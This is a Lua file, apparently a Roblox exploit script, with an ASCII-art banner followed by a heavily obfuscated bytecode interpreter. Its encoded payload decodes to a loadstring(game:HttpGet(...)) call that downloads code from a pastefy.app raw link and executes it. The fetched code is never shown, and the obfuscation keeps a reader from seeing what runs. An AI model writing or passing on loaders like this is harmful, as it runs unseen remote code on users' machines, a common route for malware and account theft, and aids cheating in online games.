--[[

░█████╗░██████╗░██╗░░██╗██╗░░██╗
██╔══██╗██╔══██╗╚██╗██╔╝██║░░██║
███████║██████╔╝░╚███╔╝░███████║
██╔══██║██╔══██╗░██╔██╗░██╔══██║
██║░░██║██║░░██║██╔╝╚██╗██║░░██║
╚═╝░░╚═╝╚═╝░░╚═╝╚═╝░░╚═╝╚═╝░░╚═╝ 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v106=v5(v84,v19);v19=nil;return v106;else return v84;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v85=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-((1 -0) -0)) -(v32-(2 -1))) + ((1685 -(68 + 997)) -(555 + 64)))) ;return v85-(v85%(932 -(857 + 74))) ;else local v86=(1639 -(1523 + 114))^(v32-1) ;return (((v31%(v86 + v86))>=v86) and (569 -(367 + 201))) or 0 ;end end local function v21() local v34=0;local v35;while true do if (v34==(1271 -(226 + 1044))) then return v35;end if (v34==(0 -(0 + 0))) then v35=v1(v16,v18,v18);v18=v18 + (118 -(32 + 85)) ;v34=1 + (957 -(892 + 65)) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;return (v37 * (469 -213)) + v36 ;end local function v23() local v38=350 -(87 + 263) ;local v39;local v40;local v41;local v42;while true do if (v38==(1 -0)) then return (v42 * (16777396 -(67 + 113))) + (v41 * (48056 + 17480)) + (v40 * (628 -372)) + v39 ;end if (v38==(0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (11 -(6 + 2)) );v18=v18 + (956 -((1799 -(915 + 82)) + 150)) ;v38=2 -1 ;end end end local function v24() local v43=v23();local v44=v23();local v45=2 -1 ;local v46=(v20(v44,1 + 0 ,26 -6 ) * (((1619 -(44 + 386)) -(1069 + 118))^(72 -40))) + v43 ;local v47=v20(v44,21,67 -36 );local v48=((v20(v44,(1492 -(998 + 488)) + 26 )==(1 -(0 + 0))) and  -(1 + 0)) or (792 -(302 + 66 + 423)) ;if (v47==(772 -(201 + 571))) then if (v46==(0 -0)) then return v48 * (18 -(10 + 8)) ;else v47=3 -(1140 -(116 + 1022)) ;v45=0;end elseif (v47==(2489 -(416 + 26))) then return ((v46==(0 -0)) and (v48 * ((4 -3)/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(1809 -786) ) * (v45 + (v46/((440 -(145 + 293))^52))) ;end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(0 + 0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;local v51={};for v66=3 -2 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0 -0 ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if (v52==(809 -(740 + 68))) then local v90=(function() return 0 + 0 ;end)();local v91=(function() return;end)();while true do if (v90==(836 -(660 + 176))) then v91=(function() return 0 + 0 ;end)();while true do if ((203 -(14 + 188))~=v91) then else v59=(function() return {};end)();for v128= #"!",v58 do local v129=(function() return 0 -0 ;end)();local v130=(function() return;end)();local v131=(function() return;end)();local v132=(function() return;end)();while true do if (v129==(0 -0)) then local v174=(function() return 675 -(534 + 141) ;end)();while true do if (v174~=(1 + 0)) then else v129=(function() return 1 -0 ;end)();break;end if ((341 -(218 + 123))==v174) then v130=(function() return 0;end)();v131=(function() return nil;end)();v174=(function() return 1;end)();end end end if (v129==(1 + 0)) then v132=(function() return nil;end)();while true do if (v130==(0 + 0)) then v131=(function() return v21();end)();v132=(function() return nil;end)();v130=(function() return 1 + 0 ;end)();end if ((1 -0)~=v130) then else if (v131== #"[") then v132=(function() return v21()~=(0 -0) ;end)();elseif (v131==2) then v132=(function() return v24();end)();elseif (v131== #"91(") then v132=(function() return v25();end)();end v59[v128]=(function() return v132;end)();break;end end break;end end end v91=(function() return 5 -3 ;end)();end if ((2 + 0)~=v91) then else v52=(function() return 2 + 0 ;end)();break;end if (v91~=(396 -(115 + 281))) then else v57=(function() return {v54,v55,nil,v56};end)();v58=(function() return v23();end)();v91=(function() return 1 + 0 ;end)();end end break;end end end if (v52~=(4 -2)) then else v57[ #"xxx"]=(function() return v21();end)();for v93= #"|",v23() do local v94=(function() return 0 -0 ;end)();local v95=(function() return;end)();while true do if (v94==(0 -0)) then v95=(function() return v21();end)();if (v20(v95, #"\\", #"\\")==(867 -(550 + 317))) then local v124=(function() return 0 -0 ;end)();local v125=(function() return;end)();local v126=(function() return;end)();local v127=(function() return;end)();while true do if (1~=v124) then else v127=(function() return {v22(),v22(),nil,nil};end)();if (v125==0) then local v176=(function() return 603 -(268 + 335) ;end)();local v177=(function() return;end)();while true do if (0==v176) then v177=(function() return 0 -0 ;end)();while true do if (v177~=0) then else v127[ #"gha"]=(function() return v22();end)();v127[ #".dev"]=(function() return v22();end)();break;end end break;end end elseif (v125== #"!") then v127[ #"xnx"]=(function() return v23();end)();elseif (v125==2) then v127[ #"-19"]=(function() return v23() -(2^16) ;end)();elseif (v125~= #"asd") then else local v189=(function() return 572 -(426 + 146) ;end)();local v190=(function() return;end)();while true do if (v189==(0 + 0)) then v190=(function() return 285 -(134 + 151) ;end)();while true do if (0~=v190) then else v127[ #"91("]=(function() return v23() -(2^(1681 -(970 + 695))) ;end)();v127[ #"?id="]=(function() return v22();end)();break;end end break;end end end v124=(function() return 3 -1 ;end)();end if ((1993 -(582 + 1408))==v124) then if (v20(v126, #"19(", #"-19")~= #",") then else v127[ #"xnxx"]=(function() return v59[v127[ #"0836"]];end)();end v54[v93]=(function() return v127;end)();break;end if (v124~=(0 -0)) then else local v169=(function() return 0 -0 ;end)();local v170=(function() return;end)();while true do if (v169==(0 -0)) then v170=(function() return 1824 -(1195 + 629) ;end)();while true do if (v170==(0 -0)) then v125=(function() return v20(v95,2, #"asd");end)();v126=(function() return v20(v95, #"?id=",6);end)();v170=(function() return 1;end)();end if (v170~=1) then else v124=(function() return 1;end)();break;end end break;end end end if (v124~=(1253 -(721 + 530))) then else if (v20(v126, #"[", #"{")~= #"<") then else v127[243 -(187 + 54) ]=(function() return v59[v127[782 -(162 + 618) ]];end)();end if (v20(v126,4 -2 ,2 + 0 )~= #">") then else v127[ #"-19"]=(function() return v59[v127[ #"19("]];end)();end v124=(function() return 703 -(271 + 429) ;end)();end end end break;end end end for v96= #"]",v23() do v55,v96,v28=(function() return v53(v55,v96,v28);end)();end return v57;end if ((0 + 0)==v52) then v53=(function() return function(v101,v102,v103) local v104=(function() return 0 + 0 ;end)();local v105=(function() return;end)();while true do if (v104==0) then v105=(function() return 1500 -(1408 + 92) ;end)();while true do if (v105==(0 -0)) then v101[v102-#"~" ]=(function() return v103();end)();return v101,v102,v103;end end break;end end end;end)();v54=(function() return {};end)();v55=(function() return {};end)();v56=(function() return {};end)();v52=(function() return 1;end)();end end end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[1088 -(461 + 625) ];local v65=v60[1291 -(993 + 295) ];return function(...) local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1 + 0 ;local v73= -(1172 -(418 + 753));local v74={};local v75={...};local v76=v12("#",...) -(1 + 0) ;local v77={};local v78={};for v87=0 + 0 ,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 + 0 ];else v78[v87]=v75[v87 + (530 -(406 + 123)) ];end end local v79=(v76-v70) + 1 + 0 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1770 -(1271 + 478 + 20) ];if (v81<=(1 + 3)) then if ((v81<=(1323 -(1035 + 214 + 73))) or (1155>2350)) then if ((4029<=4853) and (v81==(0 + 0 + 0))) then local v107=v80[1147 -(466 + 679) ];local v108=v78[v80[6 -3 ]];v78[v107 + (2 -1) ]=v108;v78[v107]=v108[v80[4]];else local v112=0;local v113;while true do if ((1900 -((1610 -(363 + 1141)) + 1794))==v112) then v113=v80[1 + 1 ];v78[v113]=v78[v113](v13(v78,v113 + 1 + 0 ,v73));break;end end end elseif (v81<=(5 -3)) then v78[v80[2]]();elseif ((v81>(7 -4)) or (516>3434)) then local v133=(267 -153) -(4 + 110) ;local v134;local v135;local v136;local v137;while true do if (v133==(586 -(57 + (1729 -(373 + 829))))) then for v181=v134,v73 do v137=v137 + (1428 -(41 + 1386)) ;v78[v181]=v135[v137];end break;end if (v133==(104 -(17 + 86))) then v73=(v136 + v134) -(1 + 0) ;v137=0 -0 ;v133=5 -3 ;end if (v133==0) then v134=v80[168 -(122 + (1624 -(1183 + 397))) ];v135,v136=v71(v78[v134](v13(v78,v134 + (1 -(731 -(476 + 255))) ,v80[3])));v133=3 -2 ;end end else do return;end end elseif (v81<=(5 + 1)) then if ((4046>=3033) and (v81==(1 + 4))) then v78[v80[3 -1 ]]=v80[68 -(30 + (1165 -(369 + 761))) ];else local v116=0 + 0 ;local v117;local v118;local v119;local v120;local v121;while true do if (v116==(1263 -(1043 + 214))) then v80=v68[v72];v121=v80[(21 -14) -5 ];v118,v119=v71(v78[v121](v13(v78,v121 + (1213 -(323 + 889)) ,v80[(6 + 1) -4 ])));v73=(v119 + v121) -((435 + 146) -(361 + 219)) ;v116=327 -(53 + 267) ;end if ((v116==(1 + 2)) or (2719<=1447)) then v80=v68[v72];v121=v80[415 -((1990 -(1913 + 62)) + 398) ];v120=v78[v80[(621 + 364) -(11 + 7 + 964) ]];v78[v121 + (3 -(5 -3)) ]=v120;v116=(5 -2) + (1 -0) ;end if ((v116==4) or (4134<3926)) then v78[v121]=v120[v80[(1936 -(565 + 1368)) + 1 ]];v72=v72 + (851 -(20 + (3121 -2291))) ;v80=v68[v72];v78[v80[(1663 -(1477 + 184)) + 0 ]]=v80[3];v116=5;end if (v116==(135 -(116 + 10))) then v78[v80[1 + 1 ]]();v72=v72 + (739 -((780 -(64 + 174)) + 196)) ;v80=v68[v72];do return;end break;end if (v116==(10 -5)) then v72=v72 + 1 + 0 ;v80=v68[v72];v78[v80[2]]=v80[3]~=(0 + 0) ;v72=v72 + 1 + 0 ;v116=15 -(2 + 7) ;end if (v116==(20 -(15 -3))) then v121=v80[2];v78[v121]=v78[v121](v13(v78,v121 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v116=1560 -(1126 + 396 + 29) ;end if ((v116==(412 -(118 + 287))) or (164>=2785)) then v117=0;for v171=v121,v73 do v117=v117 + 1 ;v78[v171]=v118[v117];end v72=v72 + (3 -2) ;v80=v68[v72];v116=1129 -((174 -56) + 1003) ;end if ((0 -0)==v116) then v117=nil;v118,v119=nil;v120=nil;v121=nil;v116=378 -(142 + 235) ;end if ((v116==2) or (525==2109)) then v72=v72 + (4 -3) ;v80=v68[v72];v78[v80[1 + 1 ]]=v62[v80[3]];v72=v72 + (978 -(553 + 424)) ;v116=5 -2 ;end if (v116==((857 -(564 + 292)) + 0)) then v78[v80[2 + 0 ]]={};v72=v72 + 1 ;v80=v68[v72];v78[v80[2 + (336 -(144 + 192)) ]]=v62[v80[(2 -0) + 1 ]];v116=2;end end end elseif (v81<=((220 -(42 + 174)) + 3)) then v78[v80[4 -2 ]]=v62[v80[7 -(11 -7) ]];elseif (v81>(17 -9)) then v78[v80[1 + 1 ]]=v80[3]~=(0 -0) ;else v78[v80[755 -(239 + (818 -(244 + 60))) ]]={};end v72=v72 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F7939546E686553762F726177000A4Q00067Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000500016Q000200056Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
